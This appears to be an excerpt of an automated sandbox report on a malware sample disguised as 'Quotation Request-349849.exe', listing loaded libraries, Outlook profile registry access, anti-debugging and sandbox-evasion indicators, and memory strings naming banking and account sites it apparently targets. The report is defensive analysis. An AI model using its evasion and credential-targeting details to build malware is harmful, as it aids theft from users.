                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Quotation Request-349849.exeStatic file information: File size 1201664 > 1048576
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Quotation Request-349849.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LcmEonpIrfS.exe, 00000005.00000002.2557763913.00000000000AE000.00000002.00000001.01000000.00000005.sdmp, LcmEonpIrfS.exe, 00000007.00000000.1802114008.00000000000AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Quotation Request-349849.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Quotation Request-349849.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Quotation Request-349849.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Quotation Request-349849.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Quotation Request-349849.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D4B37 LoadLibraryA,GetProcAddress,0_2_007D4B37
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F8945 push ecx; ret 0_2_007F8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418B23 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041183B push edi; iretd 3_2_0041183C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004180FB pushfd ; retf 3_2_00418116
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041222A push cs; retf 3_2_0041222F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004122B0 push ecx; retf 3_2_004122BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004122BF pushfd ; iretd 3_2_004122C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403350 push eax; ret 3_2_00403352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418C08 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401552 pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408562 push edi; iretd 3_2_00408563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408572 push esi; ret 3_2_00408573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00414503 push FFFFFFB7h; iretd 3_2_00414516
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004165F1 push eax; iretd 3_2_00416603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004015BB pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00413E7E push ss; retf 3_2_00413E81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408600 push ebp; iretd 3_2_00408601
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040175C pushfd ; ret 3_2_00401778
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418F7A push ecx; iretd 3_2_00418F81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00424FC3 push edi; iretd 3_2_00424FCE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD push ecx; mov dword ptr [esp], ecx3_2_03B309B6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0093225F pushad ; ret 6_2_009327F9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009327FA pushad ; ret 6_2_009327F9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0093283D push eax; iretd 6_2_00932858
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009609AD push ecx; mov dword ptr [esp], ecx6_2_009609B6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00931368 push eax; iretd 6_2_00931369
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004122A2 push FF5A8F7Dh; ret 6_2_004122AF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040E4E8 push edi; iretd 6_2_0040E4E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004209CB push ebx; retf 6_2_004209CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00410B2B push ss; retf 6_2_00410B2E
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00414DA8 pushfd ; retf 6_2_00414DC3
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007D48D7
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00855376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00855376
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F3187
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeAPI/Special instruction interceptor: Address: 15EC4BC
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                Source: C:\Windows\SysWOW64\comp.exeWindow / User API: threadDelayed 9821Jump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeEvaded block: after key decisiongraph_0-101243
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102467
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140Thread sleep count: 153 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140Thread sleep time: -306000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140Thread sleep count: 9821 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140Thread sleep time: -19642000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0083445A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083C6D1 FindFirstFileW,FindClose,0_2_0083C6D1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0083C75C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0083EF95
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0083F0F2
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0083F3F3
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008337EF
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00833B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00833B12
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0083BCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0041C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0041C420
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D49A0
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 2-64-111.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 2-64-111.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 2-64-111.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 2-64-111.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 2-64-111.6.drBinary or memory string: discord.comVMware20,11696492231f
                Source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2034604472.000001A48629C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.6.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 2-64-111.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 2-64-111.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 2-64-111.6.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 2-64-111.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: LcmEonpIrfS.exe, 00000007.00000002.2559458302.00000000006AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                Source: 2-64-111.6.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 2-64-111.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 2-64-111.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 2-64-111.6.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 2-64-111.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 2-64-111.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417743 LdrLoadDll,3_2_00417743
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00843F09 BlockInput,0_2_00843F09
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007D3B3A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00805A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00805A7C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D4B37 LoadLibraryA,GetProcAddress,0_2_007D4B37
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_015EB108 mov eax, dword ptr fs:[00000030h]0_2_015EB108
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_015EC728 mov eax, dword ptr fs:[00000030h]0_2_015EC728
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_015EC788 mov eax, dword ptr fs:[00000030h]0_2_015EC788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B663FF mov eax, dword ptr fs:[00000030h]3_2_03B663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]3_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]3_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]3_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC3CD mov eax, dword ptr fs:[00000030h]3_2_03BEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB63C0 mov eax, dword ptr fs:[00000030h]3_2_03BB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0634F mov eax, dword ptr fs:[00000030h]3_2_03C0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C310 mov ecx, dword ptr fs:[00000030h]3_2_03B2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B50310 mov ecx, dword ptr fs:[00000030h]3_2_03B50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD437C mov eax, dword ptr fs:[00000030h]3_2_03BD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov ecx, dword ptr fs:[00000030h]3_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov ecx, dword ptr fs:[00000030h]3_2_03BB035C
